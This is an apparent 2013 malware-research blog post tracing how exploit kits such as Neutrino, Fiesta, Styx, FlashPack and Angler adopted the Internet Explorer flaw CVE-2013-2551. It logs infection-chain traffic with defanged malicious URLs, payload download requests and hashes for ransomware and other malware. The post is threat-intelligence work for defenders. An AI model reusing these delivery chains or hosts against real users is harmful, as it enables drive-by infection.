2013-11-01 - Exploit Integration

CVE-2013-2551 and Exploit Kits



A late post to sum up what has been seen in Exploit Kits regarding that CVE-2013-2551.
This vulnerability has been exploited during Pwn2Own 2013 by VUPEN the 2013-03-07

First mention was by Yonathan Klijnsma from Fox-IT for Neutrino on 2013-09-10.


Malforsec wrote a post about it.
I never get a positive infection with it.

Simultaneous pass on 2 threads of Neutrino
2013-09-14 - Piece of CVE-2013-2551

On 2013-09-25 Yonathan spotted it in Fiesta.
and made a post about it. Once again I could see it fired but not owning box here. Don't know why.

Fiesta pass firing CVE-2013-2551 (no infection)
2013-10-05
On 2013-10-01 I spotted it on HiMan Exploit Kit, where i saw it working properly.


On 2013-10-05 it was being integrated in Styx

The code was exactly the same as the one in HiMan EK (the kaf() was the hint that allow me to fast notice it)

On 2013-10-06 it appeared in Magnitude :
On 2013-10-13 I saw it in Nuclear Pack
<edit1 2013-11-09>
Sweet Orange :
Spotted by EKWatcher, it's now in Sweet Orange.

Landing size double from :

Sweet Orange - 2013-11-09 02:51
to

Sweet Orange - 2013-11-09 14:48

GET http://kytus.allseasoninvesting .com:6173/order_temp/sshadmin/lol/amazon.php?english=3
200 OK (text/html)

GET http://bafes.thienchualatinhyeu .com:6173/members.php?files=588&quote=291&pets=4&sales=199&star=171&front=343&staff=37&virus=398&mail=378
200 OK (application/octet-stream) 0b17503fe267660f08d1bc23fa89cb8d <- Urausy

Urausy - Piece of BE Design 2013-11-09
</edit1>

<edit2 2013-11-26>
FlashPack : (cf CritXPack/SafePack)

Thanks to @MalwareSigs
CVE-2013-2551 Positive Path on FlashPack
2013-11-25


GET http://184.22.186 .116/koren/avbd88tyueg.php
200 OK (text/html) Landing

GET http://cedesevelloko .com/koren/jetera/5820a7dd9bc8ac26dff802aa9c027797.js
200 OK (application/javascript) Plugin Detect

GET http://cedesevelloko .com/koren/t.php?id=33327c7c392e332e302e307c7c312e372e302e377c7c31312e372e3730302e3230327c7c302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c302e302e302e307c7c302e302e302e30&cnYBSPkL17FOA=j1255080b12490912fc00b3603f246cb70
200 OK (application/javascript)

Call for Exploits iframes


GET http://cedesevelloko .com/koren/msie.php
200 OK (text/html) CVE-2013-2551

Piece of CVE-2013-2551 obfuscated in FlashPack
2013-11-26
Nicely handled by Wepawet :

GET http://cedesevelloko .com/koren/jetera/df07afd64966c80b7723cff009ffc180.jar
200 OK (application/java-archive) 18c6b5c199ec1e7695e337097675e631

GET http://cedesevelloko .com/koren/jetera/df07afd64966c80b7723cff009ffc180.jar
200 OK (application/java-archive)

GET http://cedesevelloko .com/koren/loadmsie.php?id=333
200 OK (application/octet-stream) 6229efc6e5d55c7765d112be4462d744  Zaccess

File for FlashPack: Here

</edit2>

<edit3 2013-12-03>
Angler EK :
Thanks to @EKWatcher for help with deobfuscating and defining the CVE.
Angler EK CVE-2013-2551 Positive Path 2013-12-03
Dropping Reveton 
GET http://unajipatiafrapperons.archivescouture .com/ooighee9nn
200 OK (text/html)

Piece of CVE-2013-2551 in Angler EK
2013-12-03
GET http://unajipatiafrapperons.archivescouture .com/1ooighee9nnani
200 OK (application/octet-stream) Decoded : d3448fb158b500704144fd75ec94c189

Files : Landing, Decoded Payload, Fiddler

</edit3>

Files : Here some fiddler 

 Read More :
Fiesta Exploit Kit analysis serving MSIE exploit CVE-2013-2551 - 2013-09-27 - Yonathan Klijnsma
Neutrino EK - IE exploit analysis - 2013-09-17 - Malforsec
CVE-2013-2551 MS13-037 Internet Explorer Vulnerability Metasploit Demo - 2013-06-12 - Eromang Blog
VUPEN Advanced Exploitation of Internet Explorer 10 / Windows 8 Overflow (Pwn2Own 2013) 2013-05-22 - Nicolas Joly - Vupen